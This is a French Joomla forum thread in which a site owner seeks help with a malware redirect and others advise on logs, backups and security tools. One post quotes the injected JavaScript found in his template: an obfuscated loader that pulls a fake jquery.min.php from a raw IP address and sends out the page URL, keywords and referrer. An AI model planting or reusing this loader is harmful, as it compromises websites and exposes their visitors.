Re : Logiciels malveillants (redirection)

Bonjour,
Toi qui connait la vraie adresse de la page, tu n'arrives pas à le trouver ... et tu voudrais de l'aide en fournissant une url bidon. Tu es vachement optimiste

Re : Logiciels malveillants (redirection)

désolé, url bidon est juste pour indication , et pour exprimer mon incompréhension par rapport à /index.php/ , si l'url réelle peut aider je peux vous l'envoyer .

Re : Logiciels malveillants (redirection)

je pense que j'ai peu trouvé le code en question et qui se trouvait au niveau de l'index de mon template ; le code :

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://62.129.211.23/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

la question est comment cette injection a-t-elle pu se faire ?

Re : Logiciels malveillants (redirection)

Quel template utilises-tu ?

Re : Logiciels malveillants (redirection)

un template créé via template toaster 5

Re : Logiciels malveillants (redirection)

Bonjour,
toi seul ayant accès a ton domaine peut répondre a cette question en allant farfouiller dans tes logs

Je rejoins Lomart, tu nous donnes des théories mais rien de concret, on ne peut que te répondre sur les grandes largeurs ... il y a 1000 et une façon et plusieurs failles possibles ... a commencer par ton poste de travail ... mais on va se répéter

Tout dépend de ton hébergeur, de tes extensions, de tes mises à jour régulière, de ton template ... etc
As tu un parefeu éfficace sur ton site web ? CrawlProtect n'etant plus suivi, je te conseille vivement Aesecure
Sur leur site web, tu auras beaucoup de bonne lecture

Re : Logiciels malveillants (redirection)

Merci pour vos réponses ;
le problème est que j'utilise les deux en même temps ( CrawlProtect et Aesecure), j'utilise souvent quickscan d'Aesecure pour essayer de trouver ce qui peut être comme dangereux , touts les fichiers sont verrouillés en écritures , pour l'hébergeur on est sur serveur dédié chez ovh .

Re : Logiciels malveillants (redirection)

aucun intéret d'en avoir deux

Tous les hébergeurs ont des logs pour scruter se qu'il se passe sur le site ...

Si tu es deja infecté, c'est trop tard .. il faut nettoyer de la cave au grenier avant de rajouter des couches de protection
Le quickscan est un belle outil mais il faut savoir interpréter ses résultats ... mais c'est un bon debut

Re : Logiciels malveillants (redirection)

J'ai déjà fait un nettoyage , en se basant sur la version vierge de Joomla , et en utilisant les mots clés pouvant être comme suspects et ça a marché , je scrute de temps en temps les logs d’accès et je pense que quelque chose m’échappe !
Mais là j'avoue que je suis dépassé , un script dans le fichier index du Template , est-ce que c'est une injection via un virus ou via un accès ftp je ne sais pas .
j'avoue aussi que j'utilise des modules un peu dépassés tels que Lof ArticlesSlideShow , mod featcategory ,Art News Ticker...

Re : Logiciels malveillants (redirection)

Une autre question , quel rôle pourra utilisé le poste de travail des rédacteurs du site dans une infection et comment cette dernière pourra être réalisée techniquement sachant que les postes sont sous antivirus ?

Re : Logiciels malveillants (redirection)

Bonjour.

Pour sûr tout tes templates sont hackés avec ce même code qui est un faux jquery.min.php.

C'est un hack hyper classique et généralement (toujours) il est accompagné par d'autres virus.

Si tu as un backup récent et sain il serait bon de le restaurer puis de sécuriser ton site.

Pour info CP n'est plus du tout suivi et non compatible php 7.

Bon nettoyage

Re : Logiciels malveillants (redirection)

Bonjour ,
merci cavo pour votre réponse , à vrai dire j'utilise aussi la version gratuite d'Aesecure , que je présume insuffisante .
Donc si Cp n'est pas compatible Php7 il va être obsolète, mais personnellement concernant CP il m'est utile par rapport à sa console qui me permet d'avoir les types d'attaques et la gestion des changements au niveau des fichiers et répertoires à ton réel .
pour le nettoyage j’essaie de le faire moi même afin d'avoir une certaine expérience dans le domaine .

Re : Logiciels malveillants (redirection)

Salut

Ton site était peut-être déjà hacké avant l'install d'aeSecure ou pas à jour ou...

Le logiciel est largement suffisant pour protéger un site qui est sain au moment de l'installation et sur lequel tu fais ce qu'il faut pour le garder à jour.

Bonne journée

Re : Logiciels malveillants (redirection)

Effectivement mon site été déjà hacké avant Aesecure .
Là je suis sur la version 3.6 de joomla .
je suis entrain de nettoyer et j'ai trouvé pas mal de code bizarres et de fichiers bizarres, pour les modules et plugins les seuls à jour sont admin tool et akeeba backup ...
le script jamss.php cité sur le site d'aesecure m'aide à analyser , je pense que j'ai pas bien fait le nettoyage la première fois.
c'est quoi les repertoires dans plugins remeber , stats , p3p et sef ?